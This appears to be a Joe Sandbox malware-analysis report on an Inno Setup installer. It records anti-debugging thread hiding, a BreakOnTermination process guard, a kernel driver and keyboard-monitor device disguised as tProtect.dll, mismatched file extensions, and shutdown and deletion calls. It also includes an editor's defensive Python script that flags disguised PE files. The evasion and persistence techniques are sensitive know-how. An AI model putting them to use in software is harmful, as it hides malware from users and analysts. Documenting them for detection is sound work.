Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb, source: 7zr.exe, 0000000C.00000003.1804381617.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.1804284846.0000000003870000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr (the PDB path names an amd64 driver build called TfSysMon, while the file is dropped and registered as tProtect.dll; the submitted installer itself is a 32-bit PE)
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp, Code function: 6_2_6C21AEC0 FindFirstFileA,FindClose,FindClose
Source: C:\Program Files (x86)\Windows NT\7zr.exe, Code function: 9_2_006B6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW
Source: C:\Program Files (x86)\Windows NT\7zr.exe, Code function: 9_2_006B7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000001.00000003.1771727709.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.dr, Strings found in binary or memory (all of these are DigiCert AIA/CRL/OCSP/CPS URLs carried by embedded Authenticode certificate chains, i.e. signature metadata in the dropped files, not observed network connections):
  • http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
  • http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
  • http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
  • http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
  • http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
  • http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
  • http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
  • http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
  • http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
  • http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
  • http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
  • http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
  • http://ocsp.digicert.com0A
  • http://ocsp.digicert.com0C
  • http://ocsp.digicert.com0H
  • http://ocsp.digicert.com0I
  • http://ocsp.digicert.com0X
  • http://www.digicert.com/CPS0
  • http://www.digicert.com/ssl-cps-repository.htm0
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exe, String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1684520948.000000007ECEB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1683832146.0000000003710000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000001.00000000.1685903370.00000000000B1000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000000.1775195665.00000000005ED000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp.0.dr, #U5b89#U88c5#U52a9#U624b1.0.2.tmp.5.dr, Strings found in binary or memory (Inno Setup and RemObjects PascalScript markers, consistent with the is-*.tmp / SL5 unpack chain in the process tree):
  • https://www.innosetup.com/
  • https://www.remobjects.com/ps
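The report flags dropped files whose content does not match their extension (hrsw.vbc, update.vac, res.dat, locale3.dat) and a driver build (TfSysMon.pdb) inside a file named tProtect.dll. The checks below are an added example, this editor's code and not part of the Joe Sandbox report: they identify a PE image regardless of its extension, read its machine and subsystem fields (a NATIVE-subsystem image is what sc create type= kernel expects), and pull the PDB path from the CodeView RSDS record. SAMPLES are constructed byte strings carrying only the header fields the checks read; the amd64/NATIVE values for the tProtect.dll stand-in are assumed from the objfre_wnet_amd64 directory in the PDB path and the kernel-service registration, not read from the real file.

```python
"""Static checks on dropped files. Added example, not part of the Joe Sandbox
report; SAMPLES are constructed stand-ins, not the real dropped files."""
import struct
from typing import Dict, Optional

PE_EXTENSIONS = {".exe", ".dll", ".sys", ".ocx", ".scr", ".cpl", ".drv"}
MACHINES = {0x14C: "i386", 0x8664: "amd64", 0xAA64: "arm64"}
SUBSYSTEMS = {1: "NATIVE", 2: "WINDOWS_GUI", 3: "WINDOWS_CUI"}


def pe_headers(data: bytes) -> Optional[Dict[str, str]]:
    """Return machine/subsystem for a PE image, or None if the bytes are not one."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    # "PE\0\0" + 20-byte COFF header, then the optional header; Subsystem sits at
    # optional-header offset 68 for both PE32 and PE32+.
    if e_lfanew + 24 + 70 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    (machine,) = struct.unpack_from("<H", data, e_lfanew + 4)
    (subsystem,) = struct.unpack_from("<H", data, e_lfanew + 24 + 68)
    return {"machine": MACHINES.get(machine, hex(machine)),
            "subsystem": SUBSYSTEMS.get(subsystem, str(subsystem))}


def pdb_path(data: bytes) -> Optional[str]:
    """Path from a CodeView record: 'RSDS' + GUID(16) + age(4) + NUL-terminated path.
    Scanning for the magic instead of walking the debug directory is a shortcut that
    also works on overlays and memory dumps; the .pdb suffix check filters false hits."""
    pos = data.find(b"RSDS")
    while pos != -1:
        start = pos + 4 + 16 + 4
        end = data.find(b"\0", start)
        if end != -1:
            cand = data[start:end]
            if cand and cand.isascii() and cand.lower().endswith(b".pdb"):
                return cand.decode("ascii")
        pos = data.find(b"RSDS", pos + 4)
    return None


def classify(name: str, data: bytes) -> Dict[str, object]:
    ext = ("." + name.rsplit(".", 1)[1].lower()) if "." in name else ""
    hdr = pe_headers(data)
    out: Dict[str, object] = {"name": name, "is_pe": hdr is not None,
                              "ext_mismatch": False, "kernel_driver": False, "pdb": None}
    if hdr:
        out.update(hdr)
        out["ext_mismatch"] = ext not in PE_EXTENSIONS
        out["kernel_driver"] = hdr["subsystem"] == "NATIVE"
        out["pdb"] = pdb_path(data)
    return out


def _constructed_pe(machine: int, subsystem: int, pdb: bytes = b"") -> bytes:
    """Minimal bytes with only the fields the checks read (constructed, not a real binary)."""
    buf = bytearray(0x200)
    buf[:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x80)
    buf[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<H", buf, 0x84, machine)
    struct.pack_into("<H", buf, 0x80 + 24, 0x20B if machine == 0x8664 else 0x10B)
    struct.pack_into("<H", buf, 0x80 + 24 + 68, subsystem)
    data = bytes(buf)
    if pdb:
        data += b"RSDS" + b"\x11" * 16 + struct.pack("<I", 1) + pdb + b"\0"
    return data


# Constructed stand-ins for files named in the report (header values assumed).
SAMPLES = {
    "tProtect.dll": _constructed_pe(
        0x8664, 1, rb"c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb"),
    "hrsw.vbc": _constructed_pe(0x14C, 2),
    "res.dat": b"7z\xbc\xaf\x27\x1c" + b"\0" * 64,   # 7-Zip archive magic, not a PE
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(classify(name, data))
```

On a disk image, run classify(p.name, p.read_bytes()) over everything under "C:\Program Files (x86)\Windows NT": a .vbc or .vac that comes back is_pe is the "non-matching file extension" signature, and a NATIVE-subsystem image under a .dll name is the one handed to sc create type= kernel. For the real driver, follow up with the Authenticode signature and the certificate subject, since a 64-bit kernel image only loads on w10x64 if it carries a signature Windows accepts.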

Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp, Process information set: 01 00 00 00 (the value behind the "Protects its processes via BreakOnTermination flag" signature above: with that flag set, terminating the process bugchecks the machine, so clear the flag before killing it rather than simply ending the process)
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp, Code function: 6_2_6C0A3886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread (the thread-hiding calls behind "Hides threads from debuggers"; this and the following NtSetInformationThread entries are anti-debugging, not shutdown code)
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp, Code function: 6_2_6C225120 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp, Code function: 6_2_6C0A3C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp, Code function: 6_2_6C0A3D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp, Code function: 6_2_6C225D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp, Code function: 6_2_6C0A3D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp, Code function: 6_2_6C0A39CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp, Code function: 6_2_6C0A3A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp, Code function: 6_2_6C0A1950 CreateFileA,DeviceIoControl,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp, Code function: 6_2_6C0A4754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp, Code function: 6_2_6C0A4754
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp, Code function: 6_2_6C0B4A27
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp, Code function: 6_2_6C221880
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp, Code function: 6_2_6C226A43
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp, Code function: 6_2_6C286CE0
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2D3D506_2_6C2D3D50
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C258EA16_2_6C258EA1
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2D9E806_2_6C2D9E80
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C272EC96_2_6C272EC9
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2CE8106_2_6C2CE810
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2EA9306_2_6C2EA930
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2589726_2_6C258972
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2D99F06_2_6C2D99F0
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2CFA506_2_6C2CFA50
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2D1AA06_2_6C2D1AA0
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2E4AA06_2_6C2E4AA0
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2CDAD06_2_6C2CDAD0
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C270B666_2_6C270B66
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2CAB906_2_6C2CAB90
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C260BCA6_2_6C260BCA
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C27540A6_2_6C27540A
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2DE4D06_2_6C2DE4D0
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2D25806_2_6C2D2580
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2DF5C06_2_6C2DF5C0
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2CB6506_2_6C2CB650
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2D96E06_2_6C2D96E0
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2F97006_2_6C2F9700
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C25C7CF6_2_6C25C7CF
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2D00206_2_6C2D0020
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2E37506_2_6C2E3750
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_006F81EC9_2_006F81EC
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_006CE00A9_2_006CE00A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007381C09_2_007381C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007482409_2_00748240
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007322E09_2_007322E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007523009_2_00752300
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0074C3C09_2_0074C3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007404C89_2_007404C8
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0071E49F9_2_0071E49F
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007325F09_2_007325F0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007286509_2_00728650
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007266D09_2_007266D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0072A6A09_2_0072A6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0072C9509_2_0072C950
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007009439_2_00700943
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0074E9909_2_0074E990
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00732A809_2_00732A80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0070AB119_2_0070AB11
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00728C209_2_00728C20
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00736CE09_2_00736CE0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00740E009_2_00740E00
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00744EA09_2_00744EA0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007110AC9_2_007110AC
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0073D0899_2_0073D089
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0071B1219_2_0071B121
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007411209_2_00741120
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0072D1D09_2_0072D1D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007491C09_2_007491C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007351809_2_00735180
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0072B1809_2_0072B180
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007472009_2_00747200
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0074D2C09_2_0074D2C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007153F39_2_007153F3
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_006DB3E49_2_006DB3E4
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_006B53CF9_2_006B53CF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0074F3C09_2_0074F3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0073F3A09_2_0073F3A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0074D4709_2_0074D470
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0073F4209_2_0073F420
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007274109_2_00727410
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007454D09_2_007454D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_006FD4969_2_006FD496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_006B15729_2_006B1572
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007415509_2_00741550
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007435309_2_00743530
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0075351A9_2_0075351A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0072F5009_2_0072F500
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0074F5999_2_0074F599
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007096529_2_00709652
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007536019_2_00753601
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0073D6A09_2_0073D6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_006C97669_2_006C9766
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_006B97CA9_2_006B97CA
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007477C09_2_007477C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_006DF8E09_2_006DF8E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0072F9109_2_0072F910
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0074D9E09_2_0074D9E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00737AF09_2_00737AF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00703AEF9_2_00703AEF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_006CBAC99_2_006CBAC9
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_006B1AA19_2_006B1AA1
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00737C509_2_00737C50
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_006CBC929_2_006CBC92
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0072FDF09_2_0072FDF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00735E809_2_00735E80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00735F809_2_00735F80
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess token adjusted: Security
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: String function: 6C259240 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: String function: 6C2F6F10 appears 416 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 0074FB10 appears 720 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 006B1E40 appears 83 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 006B28E3 appears 34 times
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp.5.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exeStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp.0.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp.5.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1684520948.000000007EFEA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileName8yHCrhGsg5TqPsOc.exe vs #U5b89#U88c5#U52a9#U624b1.0.2.exe
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1683832146.000000000382E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileName8yHCrhGsg5TqPsOc.exe vs #U5b89#U88c5#U52a9#U624b1.0.2.exe
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000000.1682249034.0000000000679000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName8yHCrhGsg5TqPsOc.exe vs #U5b89#U88c5#U52a9#U624b1.0.2.exe
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exeBinary or memory string: OriginalFileName8yHCrhGsg5TqPsOc.exe vs #U5b89#U88c5#U52a9#U624b1.0.2.exe
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.12.drBinary string: \Device\TfSysMon
Source: tProtect.dll.12.drBinary string: \Device\TfKbMonPWLCache
Source: classification engineClassification label: mal92.evad.winEXE@134/33@0/0
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C225D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,6_2_6C225D60
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_006B9313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,9_2_006B9313
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_006C3D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,9_2_006C3D66
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_006B9252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,9_2_006B9252
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C225240 CreateToolhelp32Snapshot,CloseHandle,Process32NextW,Process32FirstW,6_2_6C225240
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpFile created: C:\Program Files (x86)\Windows NT\is-5HBF3.tmp
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3632:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5472:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5932:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1880:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1816:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1880:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2708:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5800:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5080:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5104:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5812:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2756:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5024:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:928:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2364:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:736:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6828:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5868:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6860:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3652:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2180:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1720:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:396:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2120:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3052:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6832:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2260:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2640:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5012:120:WilError_03
